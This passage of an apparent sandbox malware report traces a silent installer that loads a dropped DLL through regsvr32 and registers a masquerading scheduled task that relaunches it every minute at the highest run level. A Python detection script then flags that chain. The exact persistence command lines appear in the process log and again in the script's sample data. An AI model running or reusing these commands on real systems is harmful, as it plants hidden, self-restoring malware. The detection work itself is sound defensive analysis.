Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8A9540
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C92D6E0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C85E7C0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C872750
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C921760
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C93C0A0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C895180
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C929151
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C872150
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8F9170
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C942280
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C860250
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C86D3A0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C92E330
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C93A330
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C92D360
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_026411FF
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_0263B6A6
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_02641750
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_026324B0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_02640CAE
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_02642D61
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04FA189C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F93436
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F9E5F0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F9B637
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F9F0A4
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F9E1C0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F91383
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F9DDE4
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F8BD7B
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F91E25
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F9CF08
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F918D4
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04F82B85
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_07680560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0273B628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0273B618
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_02731D0F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_08093EA0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8F3C94
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8F26D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8543E0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C89DCB0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C85ECF0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C855C30
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C872D80
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C926DC0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C880E80
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C89EE00
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C934E20
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8A7F80
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8C9FC0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C85EFD0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8EC8C0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C9328C0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8808D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8598E0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8E983E
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C87E870
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C942994
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C9279B0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C9469D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C944A90
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C871AF0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C873A40
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C85EA60
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C873410
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8A9540
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C92D6E0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C85E7C0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C872750
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C921760
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C93C0A0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C929151
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C872150
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8F9170
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C942280
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C860250
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C86D3A0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C856300
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C92E330
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C93A330
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C92D360
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 6C92F760 appears 47 times
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 6C930400 appears 949 times
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 6C92C280 appears 146 times
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 6C92C600 appears 94 times
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 6C92BDF0 appears 110 times
Source: eXIHsSYhOX.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: eXIHsSYhOX.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-L5KBT.tmp.6.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-L5KBT.tmp.6.dr | Static PE information: Number of sections : 11 > 10
Source: eXIHsSYhOX.exe | Static PE information: Number of sections : 11 > 10
Source: eXIHsSYhOX.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: eXIHsSYhOX.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: eXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000035DF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs eXIHsSYhOX.exe
Source: eXIHsSYhOX.exe, 00000000.00000000.1658476171.00000000007A9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs eXIHsSYhOX.exe
Source: eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F3AB000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs eXIHsSYhOX.exe
Source: eXIHsSYhOX.exe | Binary or memory string: OriginalFileName vs eXIHsSYhOX.exe
Source: eXIHsSYhOX.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 7.2.regsvr32.exe.4f812d5.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2917895885.000000000429F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine | Classification label: mal100.evad.winEXE@26/22@1/2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C86FCE0 memset,FindFirstVolumeW,memcpy,FindNextVolumeW,memcpy,FindVolumeClose,GetDiskFreeSpaceExW
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C861B10 CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | File created: C:\Users\user\AppData\Local\unins000.dat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\MUTEX
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | File created: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: eXIHsSYhOX.exe | Virustotal: Detection: 52%
Source: eXIHsSYhOX.exe | ReversingLabs: Detection: 44%
Source: eXIHsSYhOX.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | File read: C:\Users\user\Desktop\eXIHsSYhOX.exe
Source: unknown | Process created: C:\Users\user\Desktop\eXIHsSYhOX.exe "C:\Users\user\Desktop\eXIHsSYhOX.exe"
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Process created: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp "C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp" /SL5="$2048C,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\eXIHsSYhOX.exe "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Process created: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp "C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp" /SL5="$304E8,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll"
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
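The process chain listed above is the part of this report a detection engineer would turn into rules: an Inno Setup style installer (the /SL5= switch and is-*.tmp stubs) re-runs itself silently, hands a DLL dropped under %APPDATA% to regsvr32 with the /i:INSTALL switch (the DllInstall entry point, so the payload runs without any COM registration), and the code running inside regsvr32 then uses PowerShell to check for and register a scheduled task that re-launches the same regsvr32 command line every minute with -RunLevel Highest under a name imitating the Edge updater. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample. It runs three checks over constructed process-creation records in a made-up one-line-per-event format (parent image, the literal separator " -> ", command line); the first four records copy the command lines above, the "unknown" parent mirrors the report's task-launched run, and the last two records are constructed benign controls. It also generalizes a little beyond the report: the task rule accepts schtasks /create as well as Register-ScheduledTask, and the LOLBin lists cover more than regsvr32 and powershell.

```python
"""Flag the regsvr32 -> powershell -> Register-ScheduledTask chain in process-creation records.

Added example (not part of the sandbox report). Input format is constructed:
one event per line, "<ParentImage> -> <CommandLine>".
"""
import re

# Constructed sample log, modelled on the command lines in the report. The last two
# records are benign controls; the "unknown" parent mirrors the report's task-launched run.
SAMPLE_LOG = r"""
C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp -> "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll"
C:\Windows\SysWOW64\regsvr32.exe -> "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
C:\Windows\SysWOW64\regsvr32.exe -> "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
unknown -> C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
C:\Program Files\Vendor\Setup.exe -> regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"
C:\Windows\explorer.exe -> "powershell" -NoProfile Get-ChildItem
"""

SCRIPT_HOSTS = {"powershell", "pwsh", "cmd", "wscript", "cscript", "mshta", "rundll32", "certutil", "bitsadmin"}
TASK_LOLBINS = SCRIPT_HOSTS | {"regsvr32", "msiexec"}
DLLINSTALL_SWITCH = re.compile(r"\s/i(?::|\s|$)", re.I)          # regsvr32 /i[:cmdline] -> DllInstall
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(?:AppData|Desktop|Downloads|Documents)\\|\\ProgramData\\|\\Users\\Public\\", re.I)
TASK_CREATE = re.compile(r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.I)
TASK_EXEC = re.compile(r"-Execute\s+[\\\"']*([\w.]+)", re.I)      # tolerates the escaped \"regsvr32\"
TASK_INTERVAL = re.compile(r"-RepetitionInterval\s*\(New-TimeSpan\s+-Minutes\s+(\d+)\)", re.I)
TASK_RUNLEVEL = re.compile(r"-RunLevel\s+Highest", re.I)
TASK_NAME = re.compile(r"-TaskName\s+'([^']+)'", re.I)
VENDOR_UPDATER = re.compile(r"(?:microsoft|google|adobe|edge|chrome|onedrive).*update", re.I)


def base(token: str) -> str:
    """Lower-cased image name without directory or extension ('C:\\x\\regsvr32.EXE' -> 'regsvr32')."""
    name = token.strip('"').rsplit("\\", 1)[-1].lower()
    return name.rsplit(".", 1)[0] if "." in name else name


def first_token(cmdline: str) -> str:
    """Executable token of a command line, quoted or bare."""
    cmdline = cmdline.lstrip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(maxsplit=1)[0]


def check_dllinstall(cmdline: str) -> list[str]:
    """regsvr32 /i:<arg> (DllInstall entry point) against a DLL in a user-writable directory."""
    if base(first_token(cmdline)) != "regsvr32" or not DLLINSTALL_SWITCH.search(cmdline):
        return []
    return ["regsvr32 DllInstall (/i:) of a DLL in a user-writable path"] if USER_WRITABLE.search(cmdline) else []


def check_regsvr32_child(parent: str, cmdline: str) -> list[str]:
    """A DLL hosted by regsvr32 should not spawn script hosts. regsvr32 -> regsvr32 is deliberately
    not in SCRIPT_HOSTS: the 64-bit host relaunches the SysWOW64 copy for a 32-bit DLL (seen above)."""
    child = base(first_token(cmdline))
    return [f"regsvr32 spawned {child}"] if base(parent) == "regsvr32" and child in SCRIPT_HOSTS else []


def check_scheduled_task(cmdline: str) -> list[str]:
    """Task registration whose action, cadence, privilege level or name looks like persistence."""
    if not TASK_CREATE.search(cmdline):
        return []
    reasons = []
    m = TASK_EXEC.search(cmdline)
    if m and base(m.group(1)) in TASK_LOLBINS:
        reasons.append(f"task action runs LOLBin {m.group(1)}")
    m = TASK_INTERVAL.search(cmdline)
    if m and int(m.group(1)) <= 5:
        reasons.append(f"task repeats every {m.group(1)} min (resurrects the implant)")
    if TASK_RUNLEVEL.search(cmdline):
        reasons.append("task requests -RunLevel Highest")
    m = TASK_NAME.search(cmdline)
    if m and VENDOR_UPDATER.search(m.group(1)):
        reasons.append(f"task name imitates a vendor updater: {m.group(1)}")
    return reasons


def parse_log(text: str) -> list[tuple[str, str]]:
    """Split constructed '<parent> -> <cmdline>' records; lines without the separator are ignored."""
    events = []
    for line in text.splitlines():
        if " -> " in line:
            parent, cmd = line.split(" -> ", 1)
            events.append((parent.strip(), cmd.strip()))
    return events


def triage(log_text: str) -> list[dict]:
    """Run every rule over every event; return only the records with at least one reason."""
    findings = []
    for parent, cmd in parse_log(log_text):
        reasons = check_dllinstall(cmd) + check_regsvr32_child(parent, cmd) + check_scheduled_task(cmd)
        if reasons:
            findings.append({"parent": base(parent), "child": base(first_token(cmd)), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f"{hit['parent']} -> {hit['child']}")
        for reason in hit["reasons"]:
            print("   ", reason)
```

On the sample, four of the six records fire: both regsvr32 /i:INSTALL launches against the DLL under AppData\Roaming, and both PowerShell children of regsvr32, the second of which also trips all four task rules (LOLBin action, one-minute repetition, highest run level, updater-like name). The vendor installer registering a DLL under Program Files and the explorer-spawned PowerShell stay quiet. The one-minute repetition is the most durable of these indicators: the first PowerShell call only checks whether the task already exists, so a host that was cleaned without deleting the task will re-run the chain within a minute, and the task-launched regsvr32 appears with no recorded parent, exactly as in the report.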
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: shfolder.dll
